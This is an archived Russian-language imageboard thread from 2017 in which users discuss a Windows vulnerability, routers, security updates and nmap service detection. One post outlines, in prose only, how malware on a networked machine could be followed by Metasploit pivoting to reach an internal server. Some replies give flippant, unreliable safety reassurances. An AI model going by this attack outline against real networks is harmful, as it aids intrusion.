Ну это такая себе защита, никакая, службы палятся тем же нмапом по сигнатурам.
151227998
#347 #151227876
>>151227791
А я и не говорил про RDP
>>151227637
Тебе это не нужно, укатывайся из треда
#348 #151227904
>>151227791

> челиков с включенным рдп еще нужно попробовать найти.


Блядь, как ты себе представляешь сервер с данными, имеющим на сетевой карте реальный белый ip? Я такого даже в цирке не видел.
151227993151228017
#349 #151227920
>>151227714

> Сижу за роутером, не обновляю (стоит восьмерка). Мне пизда?


Роутер не панацея - в них тоже есть уязвимости и места для атак. Но в целом это конечно уменьшает шансы вляпаться.

> под обновление я ведь правильно понял обновление до более новой винды? (Да, я тупой)


Нет, обновления безопасности для твоей версии. По умолчанию в винде включены автоматические обновления. Смотри у себя в системе "обновления windows"
#350 #151227932
>>151184817 (OP)
Это как то может коснуться тех, кто сидит на 10ке и юзает вайфай роутер? Что может случится с такими людьми? Расскажите пжлст.
151227946151227968
#351 #151227946
>>151227932

>вайфай роутер


Вайфай головного мозга
#352 #151227968
>>151227932
Раз вайфай, то беспокоиться не о чем
#353 #151227993
>>151227904
Я не >>151227791, но всё же. Представь, на одной из машин в сети появляется малварь (спам, флэха с автораном, еще какая-нибудь дрисня, придумай сам). Подгружается этот же msf, делается pivoting, через поднятый туннель ломается этот злосчастный сервак.
#354 #151227998
>>151227858

> службы палятся тем же нмапом по сигнатурам


Где? На маршрутизаторе, с прописанным белым списком доступа?
#355 #151228017
Тред утонул или удален.
Это копия, сохраненная 18 апреля 2017 года.

Скачать тред: только с превью, с превью и прикрепленными файлами.
Второй вариант может долго скачиваться. Файлы будут только в живых или недавно утонувших тредах. Подробнее

Если вам полезен архив М.Двача, пожертвуйте на оплату сервера.
« /b/В начало тредаВеб-версияНастройки
/a//b//mu//s//vg/Все доски